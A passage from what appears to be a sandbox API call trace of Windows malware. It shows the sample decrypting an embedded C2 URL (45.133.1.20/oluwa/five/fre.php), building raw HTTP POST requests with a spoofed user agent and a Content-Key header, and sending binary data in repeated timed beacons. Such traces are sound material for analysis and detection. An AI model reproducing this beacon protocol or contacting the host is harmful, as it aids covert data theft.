dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0271.391] closesocket (s=0x990) returned 0 [0271.391] GetProcessHeap () returned 0x6a0000 [0271.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0271.391] GetProcessHeap () returned 0x6a0000 [0271.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0271.393] GetProcessHeap () returned 0x6a0000 [0271.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0271.395] GetProcessHeap () returned 0x6a0000 [0271.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0271.395] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x171c) returned 0x990 [0271.397] Sleep (dwMilliseconds=0xea60) [0271.399] GetProcessHeap () returned 0x6a0000 [0271.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0271.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.400] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0271.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.409] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0271.420] GetProcessHeap () returned 0x6a0000 [0271.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0271.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.423] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0271.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.424] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0271.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.425] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0271.425] GetProcessHeap () returned 0x6a0000 [0271.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0271.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.429] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0271.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.430] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0271.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.431] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0271.431] GetProcessHeap () returned 0x6a0000 [0271.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0271.431] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.432] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0271.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.433] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0271.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.441] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0271.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.442] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0271.442] GetProcessHeap () returned 0x6a0000 [0271.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0271.442] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0271.443] GetProcessHeap () returned 0x6a0000 [0271.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0271.444] GetProcessHeap () returned 0x6a0000 [0271.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0271.444] GetProcessHeap () returned 0x6a0000 [0271.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0271.445] GetProcessHeap () returned 0x6a0000 [0271.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0271.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.446] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0271.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.509] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0271.519] GetProcessHeap () returned 0x6a0000 [0271.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0271.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.524] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0271.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.528] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0271.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.530] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0271.530] GetProcessHeap () returned 0x6a0000 [0271.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0271.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.532] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0271.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.534] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0271.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.538] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0271.538] GetProcessHeap () returned 0x6a0000 [0271.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0271.539] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.540] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0271.541] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.541] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0271.542] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.542] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0271.543] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.543] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0271.543] GetProcessHeap () returned 0x6a0000 [0271.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0271.544] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0271.544] GetProcessHeap () returned 0x6a0000 [0271.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0271.544] socket (af=2, type=1, protocol=6) returned 0x994 [0271.544] connect (s=0x994, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0271.572] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0271.572] GetProcessHeap () returned 0x6a0000 [0271.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0271.572] GetProcessHeap () returned 0x6a0000 [0271.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0271.573] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0271.574] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0271.574] GetProcessHeap () returned 0x6a0000 [0271.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9db0 [0271.574] GetProcessHeap () returned 0x6a0000 [0271.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0271.575] GetProcessHeap () returned 0x6a0000 [0271.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0271.575] GetProcessHeap () returned 0x6a0000 [0271.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0271.576] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0271.577] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0271.577] GetProcessHeap () returned 0x6a0000 [0271.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0271.577] GetProcessHeap () returned 0x6a0000 [0271.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0271.578] send (s=0x994, buf=0x6bd460*, len=242, flags=0) returned 242 [0271.578] send (s=0x994, buf=0x6bb998*, len=159, flags=0) returned 159 [0271.578] GetProcessHeap () returned 0x6a0000 [0271.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0271.578] recv (in: s=0x994, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0271.654] GetProcessHeap () returned 0x6a0000 [0271.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0271.654] GetProcessHeap () returned 0x6a0000 [0271.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0271.655] GetProcessHeap () returned 0x6a0000 [0271.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9db0 | out: hHeap=0x6a0000) returned 1 [0271.655] GetProcessHeap () returned 0x6a0000 [0271.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0271.655] closesocket (s=0x994) returned 0 [0271.656] GetProcessHeap () returned 0x6a0000 [0271.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0271.656] GetProcessHeap () returned 0x6a0000 [0271.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0271.656] GetProcessHeap () returned 0x6a0000 [0271.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0271.656] GetProcessHeap () returned 0x6a0000 [0271.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0271.657] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1720) returned 0x994 [0271.659] Sleep (dwMilliseconds=0xea60) [0271.661] GetProcessHeap () returned 0x6a0000 [0271.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0271.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.663] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0271.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.668] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0271.680] GetProcessHeap () returned 0x6a0000 [0271.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d9b98 [0271.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.681] CryptImportKey (in: hProv=0x6bef48, pbData=0x6d9b98, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0271.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.682] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0271.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.684] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0271.684] GetProcessHeap () returned 0x6a0000 [0271.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9b98 | out: hHeap=0x6a0000) returned 1 [0271.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.686] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0271.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.688] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0271.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.689] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0271.689] GetProcessHeap () returned 0x6a0000 [0271.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0271.690] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.693] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0271.694] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.694] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0271.695] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.696] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0271.699] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.700] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0271.700] GetProcessHeap () returned 0x6a0000 [0271.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0271.700] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0271.700] GetProcessHeap () returned 0x6a0000 [0271.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0271.701] GetProcessHeap () returned 0x6a0000 [0271.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0271.701] GetProcessHeap () returned 0x6a0000 [0271.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0271.701] GetProcessHeap () returned 0x6a0000 [0271.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0271.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.703] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0271.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.712] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0271.723] GetProcessHeap () returned 0x6a0000 [0271.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0271.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.724] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0271.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.725] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0271.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.728] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0271.728] GetProcessHeap () returned 0x6a0000 [0271.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0271.730] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.731] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0271.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.732] CryptDestroyKey (hKey=0x6ad020) returned 1 [0271.733] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0271.733] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0271.733] GetProcessHeap () returned 0x6a0000 [0271.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0271.734] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.734] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0271.735] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.735] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0271.736] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.737] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0271.738] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0271.738] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0271.738] GetProcessHeap () returned 0x6a0000 [0271.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0271.738] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0271.738] GetProcessHeap () returned 0x6a0000 [0271.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0271.738] socket (af=2, type=1, protocol=6) returned 0x998 [0271.739] connect (s=0x998, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0271.762] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0271.762] GetProcessHeap () returned 0x6a0000 [0271.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0271.763] GetProcessHeap () returned 0x6a0000 [0271.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0271.764] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0271.767] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0271.767] GetProcessHeap () returned 0x6a0000 [0271.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba0b0 [0271.767] GetProcessHeap () returned 0x6a0000 [0271.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0271.768] GetProcessHeap () returned 0x6a0000 [0271.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0271.768] GetProcessHeap () returned 0x6a0000 [0271.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0271.769] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0271.770] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0271.770] GetProcessHeap () returned 0x6a0000 [0271.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0271.770] GetProcessHeap () returned 0x6a0000 [0271.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0271.770] send (s=0x998, buf=0x6bd460*, len=242, flags=0) returned 242 [0271.771] send (s=0x998, buf=0x6bb998*, len=159, flags=0) returned 159 [0271.771] GetProcessHeap () returned 0x6a0000 [0271.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0271.772] recv (in: s=0x998, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0271.860] GetProcessHeap () returned 0x6a0000 [0271.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0271.861] GetProcessHeap () returned 0x6a0000 [0271.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0271.861] GetProcessHeap () returned 0x6a0000 [0271.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba0b0 | out: hHeap=0x6a0000) returned 1 [0271.863] GetProcessHeap () returned 0x6a0000 [0271.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0271.864] closesocket (s=0x998) returned 0 [0271.864] GetProcessHeap () returned 0x6a0000 [0271.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0271.864] GetProcessHeap () returned 0x6a0000 [0271.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0271.865] GetProcessHeap () returned 0x6a0000 [0271.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0271.865] GetProcessHeap () returned 0x6a0000 [0271.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0271.866] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, 